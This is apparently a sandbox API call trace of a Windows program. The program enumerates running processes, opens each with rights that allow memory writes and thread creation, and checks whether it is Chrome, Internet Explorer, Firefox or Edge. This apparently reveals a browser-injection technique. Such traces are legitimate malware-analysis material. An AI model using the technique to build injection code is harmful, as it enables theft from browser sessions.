	[0211.412] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3a48
	[0211.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.413] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.413] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.413] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.414] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.414] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3a4c
	[0211.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.415] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.415] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.415] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.416] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.416] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3a50
	[0211.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.417] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.417] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.417] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.418] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.418] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3a54
	[0211.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.419] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.419] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.419] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.419] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.420] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3a58
	[0211.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.420] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.421] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.421] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.421] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0211.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3a5c
	[0211.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.422] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0211.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.423] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.423] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0211.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.423] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3a60
	[0211.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.424] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.425] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.425] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.425] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.426] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0211.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3a64
	[0211.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.426] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.427] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.427] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.427] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.428] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3a68
	[0211.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.428] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3a6c
	[0211.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.430] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.431] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.431] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.431] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0211.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3a70
	[0211.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.432] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0211.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0211.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0211.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3a74
	[0211.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.434] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0211.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0211.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.435] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0211.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3a78
	[0211.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.436] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.437] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.437] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.437] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0211.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3a7c
	[0211.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.438] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0211.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.438] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.439] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0211.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.439] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0211.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0211.440] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0211.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3a80
	[0211.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.441] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0211.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.441] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.442] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0211.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.442] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0211.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3a84
	[0211.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.444] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0211.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.444] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.445] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0211.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.445] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0211.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3a88
	[0211.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.446] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0211.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.446] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.447] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0211.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.447] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0211.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3a8c
	[0211.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.448] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0211.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.448] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.449] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0211.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.449] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.449] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0211.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3a90
	[0211.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.450] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0211.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.451] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.451] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0211.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.452] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0211.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3a94
	[0211.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.453] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0211.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.453] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.453] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0211.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.454] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.454] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0211.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3a98
	[0211.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.455] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0211.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.455] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.455] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0211.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.456] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.456] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0211.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3a9c
	[0211.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.457] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0211.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.457] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.458] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0211.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.458] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.465] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0211.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3aa0
	[0211.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.466] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0211.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.467] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.467] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0211.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.467] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.467] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0211.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3aa4
	[0211.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.468] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0211.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.468] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.469] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0211.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.469] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.469] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0211.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3aa8
	[0211.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
